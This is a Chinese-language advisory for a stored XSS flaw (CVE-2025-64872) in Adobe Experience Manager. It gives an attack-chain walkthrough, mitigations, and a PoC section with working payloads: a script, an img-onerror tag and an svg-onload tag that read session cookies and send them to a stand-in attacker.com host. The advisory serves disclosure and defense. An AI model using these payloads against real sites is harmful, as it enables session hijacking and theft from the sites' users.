CVE-2025-64872 Adobe Experience Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64872

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64872是Adobe Experience Manager中的一个存储型跨站脚本（XSS）漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。漏洞允许具有高权限的攻击者在易受攻击的表单字段中注入恶意脚本代码。由于是存储型XSS，恶意JavaScript代码会被永久保存在服务器端，当其他用户访问包含该恶意内容的页面时，攻击代码会在受害者浏览器中执行。这可能导致会话劫持、敏感信息窃取、钓鱼攻击或对用户进行进一步的攻击。攻击成功的前提是攻击者拥有较高的账户权限，并且需要诱导受害者访问包含恶意脚本的页面。

技术细节

Adobe Experience Manager 6.5.23及更早版本在处理用户输入的表单字段时存在存储型XSS漏洞。漏洞的根本原因是在将用户输入的数据存储到服务器时，缺少对特殊字符（如<、>、"、'、script等）的适当过滤和转义处理。当高权限攻击者在表单字段中提交包含恶意JavaScript代码的内容时，这些代码会被保存到数据库中。当其他用户（尤其是低权限用户）访问包含该表单字段的页面时，服务器会从数据库中取出未经过滤的数据并返回给用户浏览器，导致恶意脚本在用户浏览器上下文中执行。攻击者可利用此漏洞窃取受害者的会话cookie、劫持用户账户、执行任意操作或进行钓鱼攻击。CVSS 3.1向量显示该漏洞需要网络访问（AV:N）、低复杂度攻击（AC:L）、高权限认证（PR:H）以及用户交互（UI:R），影响范围仅限于机密性和完整性的低级别影响。

攻击链分析

STEP 1

Reconnaissance

攻击者首先识别目标Adobe Experience Manager实例，并确定其版本号。攻击者需要确认目标版本为6.5.23或更早版本。

STEP 2

Authentication

攻击者获取Adobe Experience Manager的高权限账户（如管理员或内容编辑者权限），或者通过其他方式（如社会工程学或凭据泄露）获得高权限访问。

STEP 3

Payload Injection

攻击者登录系统后，导航到存在表单字段的页面（如内容编辑页面、表单组件等），在表单字段中注入包含恶意JavaScript代码的Payload。

STEP 4

Persistence

恶意脚本被提交后，由于系统未对用户输入进行充分的过滤和转义处理，恶意代码被永久存储在服务器数据库或内容存储库中。

STEP 5

Victim Trigger

当受害者（普通用户）访问包含该恶意表单字段的页面时，服务器从数据库中取出未经过滤的数据并返回给用户浏览器。

STEP 6

Code Execution

受害者浏览器接收到包含恶意脚本的页面后，执行该JavaScript代码。攻击者可借此窃取受害者的会话cookie、劫持账户或执行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64872 Stored XSS PoC for Adobe Experience Manager -->
<!-- This PoC demonstrates the stored XSS vulnerability in AEM form fields -->

<!-- Step 1: Identify a form field that can be edited by high-privileged users -->
<!-- Step 2: Inject malicious JavaScript payload into the form field -->

<script>
// Basic XSS payload to demonstrate vulnerability
alert('XSS Vulnerability - CVE-2025-64872');
console.log('Adobe Experience Manager Stored XSS Detected');

// Cookie stealing payload (for demonstration purposes)
var stolenCookie = document.cookie;
// In real attack, this would be sent to attacker-controlled server
// fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookie));

// Session hijacking payload example
// This payload attempts to steal session tokens
var sessionData = {
    cookies: document.cookie,
    localStorage: localStorage.getItem('cq-authoring-session'),
    referrer: document.referrer,
    userAgent: navigator.userAgent
};
console.log('Session Data:', JSON.stringify(sessionData));
</script>

<!-- Alternative payload using img tag with onerror -->
<img src=x onerror="this.src='https://attacker.com/log?c='+document.cookie">

<!-- SVG-based payload -->
<svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>

<!-- Note: This PoC is for authorized security testing only -->

影响范围

Adobe Experience Manager 6.5.23 及更早版本

Adobe Experience Manager 6.5.x < 6.5.24

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）限制高权限账户的使用，避免共享账户；2）启用AEM的安全配置，对表单输入实施白名单过滤；3）部署Web应用防火墙（WAF）规则检测和阻止XSS攻击特征；4）监控日志中的可疑请求和异常行为；5）使用HTTPOnly和Secure标志保护会话Cookie；6）考虑对高风险页面实施额外的CSRF保护机制。